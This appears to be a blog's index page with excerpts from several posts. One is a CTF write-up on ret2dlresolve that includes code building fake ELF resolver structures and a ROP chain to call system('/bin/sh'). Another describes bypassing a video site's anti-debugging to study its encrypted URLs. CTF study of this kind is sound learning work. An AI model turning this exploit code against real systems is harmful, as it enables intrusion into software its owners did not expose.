Aynakeya's Blog

Kill My Emotion

0x0 Different

The memory mapping is a little different.

Before the init function is called, notice that the rw- page in the memory map spans 0x2000 bytes, from 0x0804b000 to 0x0804d000:

0x0804b000 - 0x0804d000 - usr     8K s rw- /home/aynakeya/ctf/k3rn3lctf2021/silent-rop/silent-ROP /home/aynakeya/ctf/k3rn3lctf2021/silent-rop/silent-ROP ; map.

However, after entering main (that is, after init has been called), the rw- mapping spans only 0x1000 bytes, from 0x0804c000 to 0x0804d000: only the 4K page that holds _GLOBAL_OFFSET_TABLE_ is still writable:

0x0804c000 - 0x0804d000 - usr     4K s rw- /home/aynakeya/ctf/k3rn3lctf2021/silent-rop/silent-ROP /home/aynakeya/ctf/k3rn3lctf2021/silent-rop/silent-ROP ; obj._GLOBAL_OFFSET_TABLE_
Read more »

0x0 Introduction

In the recent k3rn3lctf there was a pwn challenge called silent-ROP.

In this challenge there is no output at all: neither puts nor printf is imported, so there is no way to leak a libc address or identify the libc version. The usual ret2libc approach therefore does not work here, because we cannot learn the address of system.

:> ii
[Imports]
nth vaddr bind type lib name
―――――――――――――――――――――――――――――――――――――
1 0x08049070 GLOBAL FUNC read
2 0x00000000 WEAK NOTYPE __gmon_start__
3 0x08049080 GLOBAL FUNC __libc_start_main
4 0x00000000 GLOBAL OBJ stdin
5 0x08049090 GLOBAL FUNC setvbuf
6 0x00000000 GLOBAL OBJ stdout

Solving this challenge requires a technique called ret2dlresolve. After several hours of reading articles, I finally understood the process of return-to-dl-resolve.
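The core of ret2dlresolve is feeding the lazy-binding resolver a relocation entry, symbol entry and symbol name that we control, so that it looks up "system" for us even though the binary never imports it. The following is an added example, not code from this write-up or from the challenge: it builds those fake i386 structures with struct, then parses them back exactly the way glibc's _dl_fixup() would, so the offsets can be checked offline before anything is sent. All addresses (JMPREL, SYMTAB, STRTAB, PLT0, BUF) are made-up values for a hypothetical non-PIE 32-bit binary; read the real ones from readelf -d or radare2.

```python
import struct

# Added example, not code from the write-up. Builds the fake ELF structures a
# 32-bit ret2dlresolve payload needs and parses them back the way glibc's
# _dl_fixup() does. The addresses below are made-up values for a hypothetical
# non-PIE i386 binary: read the real DT_JMPREL / DT_SYMTAB / DT_STRTAB and PLT0
# with `readelf -d` or radare2, and pick a writable buffer (e.g. in .bss).
JMPREL = 0x08048330   # hypothetical .rel.plt
SYMTAB = 0x080481cc   # hypothetical .dynsym
STRTAB = 0x0804824c   # hypothetical .dynstr
PLT0   = 0x08049030   # hypothetical PLT0 (push link_map; jmp _dl_runtime_resolve)
BUF    = 0x0804c800   # hypothetical writable address we can read() into

R_386_JMP_SLOT = 7
REL_SIZE, SYM_SIZE = 8, 16        # sizeof(Elf32_Rel), sizeof(Elf32_Sym)
STB_GLOBAL, STT_FUNC = 1, 2


def p32(v):
    return struct.pack("<I", v & 0xFFFFFFFF)


def u32(b):
    return struct.unpack("<I", b)[0]


def build_fake_structs(buf_addr, jmprel, symtab, strtab, func_name, arg_data):
    """Lay out [Elf32_Rel][pad][Elf32_Sym][name\\0][pad][scratch][arg_data] at buf_addr.

    Returns (blob, reloc_arg, arg_addr). _dl_fixup(link_map, reloc_arg) computes
        rel  = JMPREL + reloc_arg
        sym  = SYMTAB + ELF32_R_SYM(rel.r_info) * 16
        name = STRTAB + sym.st_name
    so every field is an offset relative to those tables, not to buf_addr.
    """
    rel_addr = buf_addr
    sym_addr = rel_addr + REL_SIZE
    # The symbol index is (sym_addr - symtab) // 16, so the fake Elf32_Sym must
    # sit on a 16-byte boundary relative to SYMTAB; pad up to the next slot.
    sym_addr += (-(sym_addr - symtab)) % SYM_SIZE
    name = func_name.encode() + b"\0"
    str_addr = sym_addr + SYM_SIZE
    scratch_addr = str_addr + len(name)
    scratch_addr += (-scratch_addr) % 4          # 4-byte slot, keep it aligned
    arg_addr = scratch_addr + 4

    sym_index = (sym_addr - symtab) // SYM_SIZE
    # r_offset must be writable: the resolver stores the resolved address there.
    fake_rel = p32(scratch_addr) + p32((sym_index << 8) | R_386_JMP_SLOT)
    fake_sym = (p32(str_addr - strtab)                      # st_name
                + p32(0) + p32(0)                           # st_value, st_size
                + bytes([(STB_GLOBAL << 4) | STT_FUNC, 0])  # st_info, st_other
                + struct.pack("<H", 0))                     # st_shndx = SHN_UNDEF
    # Caveat: st_other = 0 (default visibility) makes _dl_fixup do a real lookup,
    # and on a binary with version info it first reads VERSYM[sym_index]; that
    # index must land on readable memory and yield a harmless version entry or
    # the lookup crashes. Choosing buf_addr is what controls sym_index.
    blob = bytearray(fake_rel)
    blob += b"\0" * (sym_addr - (rel_addr + REL_SIZE))
    blob += fake_sym
    blob += name
    blob += b"\0" * (scratch_addr - (str_addr + len(name)))
    blob += b"\0" * 4                              # scratch slot for r_offset
    blob += arg_data
    return bytes(blob), rel_addr - jmprel, arg_addr


def rop_chain(plt0, reloc_arg, arg_addr, ret_addr=0xDEADBEEF):
    """Return into PLT0 with reloc_arg on top of the stack, exactly as a PLT stub
    would have pushed it; the resolver then calls the looked-up function with
    ret_addr as its return address and arg_addr as its first argument."""
    return p32(plt0) + p32(reloc_arg) + p32(ret_addr) + p32(arg_addr)


def simulate_dl_fixup(blob, buf_addr, jmprel, symtab, strtab, reloc_arg):
    """Walk the fake structures the way _dl_fixup() would, treating blob (mapped
    at buf_addr) as the only readable memory. Returns (name, r_type, r_offset)."""
    def read(addr, n):
        off = addr - buf_addr
        if not 0 <= off <= len(blob) - n:
            raise ValueError("read outside payload at %#x" % addr)
        return blob[off:off + n]

    rel_addr = jmprel + reloc_arg
    r_offset, r_info = u32(read(rel_addr, 4)), u32(read(rel_addr + 4, 4))
    r_type, sym_index = r_info & 0xFF, r_info >> 8
    if r_type != R_386_JMP_SLOT:
        raise ValueError("unexpected relocation type %d" % r_type)
    st_name = u32(read(symtab + sym_index * SYM_SIZE, 4))
    name_addr = strtab + st_name
    name = b""
    while read(name_addr + len(name), 1) != b"\0":
        name += read(name_addr + len(name), 1)
    return name.decode(), r_type, r_offset


def demo():
    blob, reloc_arg, arg_addr = build_fake_structs(BUF, JMPREL, SYMTAB, STRTAB, "system", b"/bin/sh\0")
    return blob, reloc_arg, arg_addr, simulate_dl_fixup(blob, BUF, JMPREL, SYMTAB, STRTAB, reloc_arg)


if __name__ == "__main__":
    blob, reloc_arg, arg_addr, resolved = demo()
    print("reloc_arg = %#x, arg at %#x, resolver would look up %r" % (reloc_arg, arg_addr, resolved[0]))
    print("chain:", rop_chain(PLT0, reloc_arg, arg_addr).hex())
```

In a real exploit the blob is written to BUF with the imported read(), and the chain returns into PLT0; the only input the resolver sees is reloc_arg on the stack, which is why the payload works without any libc leak.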

Read more »

Brief

When using the radare2 debugger, how do you deal with user input while debugging? There are two simple methods.

  • use rarun2 with stdio
  • use pwntools with debugger.

use rarun2

  1. Open a second terminal, run tty, and note the output:
    $ tty
    /dev/pts/2
  2. Create a file p.rr2 whose stdio line is set to the tty value you got from the second terminal:
    # p.rr2 content
    stdio=/dev/pts/2
  3. In the second terminal, run sleep 9999999999 so that the shell stays idle and the terminal is free to carry the program's output and your input.
  4. In the first terminal, run r2 -r p.rr2 -d vuln and start debugging!

see more: doc
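The steps above are easy to get wrong in one place: the stdio line must name the other terminal's tty, not the one r2 runs in, and it must be a device path. The following is an added example (not the post's code) that generates p.rr2 from the tty string and refuses both mistakes; the file name p.rr2, the stdio= key and the /dev/pts/2 sample are from the post, the target name vuln is assumed.

```python
import os
import re

# Added example, not the post's code: generates the p.rr2 profile for the
# rarun2 procedure and catches the two easy mistakes, a value that is not a
# tty device path and the tty of the terminal r2 itself is running in.
TTY_RE = re.compile(r"^/dev/(?:pts/\d+|tty\d+)$")


def rr2_profile(tty):
    """Return the p.rr2 text that attaches the debuggee's stdin/stdout to tty."""
    if not TTY_RE.match(tty):
        raise ValueError("%r is not a tty device path; run `tty` in the second terminal" % tty)
    try:
        own_tty = os.ttyname(0)
    except OSError:            # stdin is not a terminal, e.g. run from a script
        own_tty = None
    if tty == own_tty:
        raise ValueError("%s is this terminal's tty; use the second terminal's" % tty)
    return "# p.rr2 content\nstdio=%s\n" % tty


def write_rr2(tty, path="p.rr2", target="vuln"):
    """Write the profile and return the command to run in each terminal."""
    with open(path, "w") as f:
        f.write(rr2_profile(tty))
    return {
        "second terminal": "sleep 9999999999",
        "first terminal": "r2 -r %s -d %s" % (path, target),
    }


if __name__ == "__main__":
    import sys
    print(write_rr2(sys.argv[1] if len(sys.argv) > 1 else "/dev/pts/2"))
```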

use pwntools

In the pwntools template, add the following code (start() is the helper the template defines):

from pwn import *

io = start()
pid = util.proc.pidof(io)[0]
print("The pid is: " + str(pid))
util.proc.wait_for_debugger(pid)   # blocks until a debugger attaches to the process
input("press enter to continue")
io.interactive()

Then run radare2 with r2 -d <pid>, using the pid printed by the script.

Preface

I have been working on a web scraping project recently and came across a pretty good anime site. Its video URL resolution seems to be encrypted, and since I had some free time I took a look at how the decryption is done.

Preparation

Today's target: agefans

First, open F12 and look at which HTTP requests are made. This site even clears the console and triggers an endless debugger loop to stop us from using the developer tools.

[screenshots: 2021-10-14_084109.jpg, 2021-10-14_084120.jpg]

That doesn't matter though; just deactivate breakpoints.

[screenshot: 2021-10-14_084200.png]

Simple analysis

First, search for where the video file shows up.

It turns out the video URL is obtained from the _getplay2 API.

Further analysis shows that _getplay2 is reached through a 302 redirect from _getplay.

Read more »

I'm really done. Can't people just study properly in the library instead of flaunting their relationship? If you want to show off, do it in your room. It's making me sick.

Seriously numb. That guy strokes the girl's hair every five minutes, and they keep chatting on top of it. I'm going to explode.

Consider these two pieces of code:

powers = [lambda x: x**i for i in range(10)]
print(powers[3](2))
powers1 = []
for i in range(10):
    powers1.append(lambda x: x**i)
print(powers1[3](2))

What result do you expect?
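The answer to the quiz, as an added example that is not part of the original post: both lists behave the same way, because each lambda closes over the variable i and reads it when called, not when created. In Python 3 a list comprehension runs in its own scope, but that scope still has a single i that every iteration rebinds, so powers is no better off than powers1. The example reproduces the two lists from the post, adds the two usual fixes, and shows how to inspect what a given function will actually see as i.

```python
import functools

# Added example, not the post's code: the two lists from the quiz, the usual
# fixes, and a helper that shows what each function will really use as i.


def late_bound_powers():
    """The two lists from the quiz. Both lambdas are closures over the *same*
    variable i, which is read when the lambda is called, not when it is created,
    so by then i is 9 for every element."""
    powers = [lambda x: x ** i for i in range(10)]
    powers1 = []
    for i in range(10):
        powers1.append(lambda x: x ** i)
    return powers, powers1


def early_bound_powers():
    """Two fixes: freeze i as a default argument (evaluated at definition time),
    or bind it with functools.partial."""
    by_default = [lambda x, i=i: x ** i for i in range(10)]
    by_partial = [functools.partial(lambda i, x: x ** i, i) for i in range(10)]
    return by_default, by_partial


def captured_i(fn):
    """What a plain function will see as i: the closure cell's current value if
    it closes over i, otherwise the frozen default argument."""
    if fn.__closure__:
        return fn.__closure__[0].cell_contents
    return fn.__defaults__[0]


if __name__ == "__main__":
    powers, powers1 = late_bound_powers()
    print(powers[3](2), powers1[3](2))          # 512 512: i is 9 by the time they run
    by_default, by_partial = early_bound_powers()
    print(by_default[3](2), by_partial[3](2))   # 8 8
```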

Read more »

The steps are simple.

Suppose you need a 1920x1080 resolution.

1. Run cvt 1920 1080, which prints something like this:

# 1920x1080 59.96 Hz (CVT 2.07M9) hsync: 67.16 kHz; pclk: 173.00 MHz
Modeline "1920x1080_60.00" 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync

2. Run xrandr to see what the current output is called. On VirtualBox it is usually Virtual1; otherwise look at which output has the most modes listed.

3. Run xrandr --newmode "1920x1080_60.00" 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync, copy-pasting the values cvt printed.

4. Run xrandr --addmode Virtual1 1920x1080_60.00 to add the mode to that output.

5. Pick the resolution in Settings.

6. The mode may disappear after a reboot; put steps 3 and 4 in .profile.
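Steps 1, 3 and 4 amount to copying the Modeline numbers from cvt into two xrandr commands. The following is an added example, not the post's code, that does the copying by parsing cvt's output, so nothing is retyped by hand and a missing timing value is caught. SAMPLE_CVT is the cvt output quoted in the post, and "Virtual1" is the VirtualBox output name the post mentions; commands_for() runs the real cvt and is only useful on a machine that has it.

```python
import re
import shlex
import subprocess

# Added example, not the post's code: parses `cvt` output and emits the
# xrandr --newmode / --addmode commands from the steps above.
# SAMPLE_CVT is the cvt output quoted in the post.
SAMPLE_CVT = """\
# 1920x1080 59.96 Hz (CVT 2.07M9) hsync: 67.16 kHz; pclk: 173.00 MHz
Modeline "1920x1080_60.00" 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync
"""

MODELINE_RE = re.compile(r'^Modeline\s+"([^"]+)"\s+(.+)$')


def parse_modeline(cvt_text):
    """Return (mode_name, params) from cvt output; params are the pixel clock,
    the eight h/v timing values and the sync flags as separate tokens."""
    for line in cvt_text.splitlines():
        m = MODELINE_RE.match(line.strip())
        if m:
            params = m.group(2).split()
            if len(params) < 9:      # pclk + 4 horizontal + 4 vertical values at least
                raise ValueError("modeline too short: %r" % line)
            return m.group(1), params
    raise ValueError("no Modeline in cvt output")


def xrandr_commands(cvt_text, output="Virtual1"):
    """Build the two commands to run (and to put in ~/.profile to survive reboots)."""
    name, params = parse_modeline(cvt_text)
    return [
        "xrandr --newmode %s %s" % (shlex.quote(name), " ".join(params)),
        "xrandr --addmode %s %s" % (shlex.quote(output), shlex.quote(name)),
    ]


def commands_for(width, height, output="Virtual1"):
    """Run cvt for the requested size and return the xrandr commands (needs cvt installed)."""
    out = subprocess.run(["cvt", str(width), str(height)],
                         check=True, capture_output=True, text=True).stdout
    return xrandr_commands(out, output)


if __name__ == "__main__":
    for cmd in xrandr_commands(SAMPLE_CVT):
        print(cmd)
```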

After booting Ubuntu I found that the terminal would not open.

Firefox and the other applications opened fine.

I pressed ctrl+alt+f3 to get a console and found, damn it:

no module named apt_pkg

Then I remembered that before shutting down I had changed the /usr/bin/python3 symlink from the original python3.8 to python3.9...

So changing the symlink back to python3.8 and rebooting fixed it.

Dammit, the VPS provider lost power and the whole blog is gone.
